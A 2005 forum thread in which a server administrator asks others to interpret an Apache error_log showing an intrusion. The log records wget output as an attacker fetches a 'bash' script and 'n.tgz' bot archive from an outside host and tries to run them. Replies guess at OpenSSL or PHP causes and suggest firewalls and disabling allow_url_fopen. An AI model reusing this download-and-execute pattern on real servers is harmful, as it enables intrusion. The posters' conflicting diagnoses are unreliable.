Attacks agains Apache in error_log

[carock]

I'm trying to fingure out how my box is being attacked. I'm looking the the Apache error_log and I find entries like this every once in a while...

[Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/images/form.5B4jpg
[Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/404.shtml
--08:11:31-- http://wget/
=> `index.html'
Resolving wget... failed: Host not found.
--08:11:31-- http://members.lycos.co.uk/icetriton/bash
=> `bash'
Resolving members.lycos.co.uk... done.
Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,649 [text/plain]

0K .......... ........ 100% 56.38 KB/s

08:11:32 (56.38 KB/s) - `bash' saved [18649/18649]


FINISHED --08:11:32--
Downloaded: 18,649 bytes in 1 files
sh: line 1: ./bash: Permission denied
sh: line 1: cd: /var/spool/samba: No such file or directory
sh: line 1: lwget: command not found
tar (child): n.tgz: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
sh: line 1: cd: bot: No such file or directory
[Mon Aug 22 08:20:01 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
[Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/images/rollovers/sun$
[Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
[Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/news/1999/0425-amiga.shtml
[Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/404.shtml
--08:22:01-- http://members.lycos.co.uk/icetriton/n.tgz
=> `n.tgz'
Resolving members.lycos.co.uk... done.
Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 217,288 [text/plain]

0K .......... .......... .......... .......... .......... 23% 80.65 KB/s
50K .......... .......... .......... .......... .......... 47% 318.47 KB/s
100K .......... .......... .......... .......... .......... 70% 314.47 KB/s
150K .......... .......... .......... .......... .......... 94% 337.84 KB/s
200K .......... .. 100% 1.70 MB/s

08:22:03 (194.50 KB/s) - `n.tgz' saved [217288/217288]

sh: line 1: ./bash: Permission denied
-----------------------------------------------------------
and so on.

The wierd thing is all the regular log entries in the middle. There's no request or source IP's logged, so I don't know where to go to findout how this person is getting files to upload on the server.

Anyone deal with this before? I have Apache 1.3.33 and WHM 10.1.0 cPanel 10.2.0-S83 on RedHat 9

Thanks,
Chuck

[romanh]

I have the same errors right now.
I found that it is a issue of OpenSSL.
For attacer is possible to gain a shell.
The attacer usually save the file to /tmp or /var/tmp directory.
He ussually runs some 'bot' scripts for IRC, DCC, ...

I have CentOS 3 and I'm going to reinstall my box to Fedora Core 4.
CentOS does not provide the OpenSSL updates.
Also I think will be the same with Fedora 4, but I'll try to build OpenSSL from source
so later I can easily patch it.

Roman

[AndyReed]

What did you do to secure your server? Do you have system based firewall including Mod Security, Mod Evasive, APF and BFD? Are they confgiured properly and have a very good set of rules?

Do you see any unusual server load?

[romanh]

I have just APF installed.
This is the versions on my box

Apache 1.3.34

OpenSSL 0.9.7a

PHP 4.4.2

[romanh]

It is quite known bug in PHP.
to solve this I had to set allow_url_fopen = Off in php.ini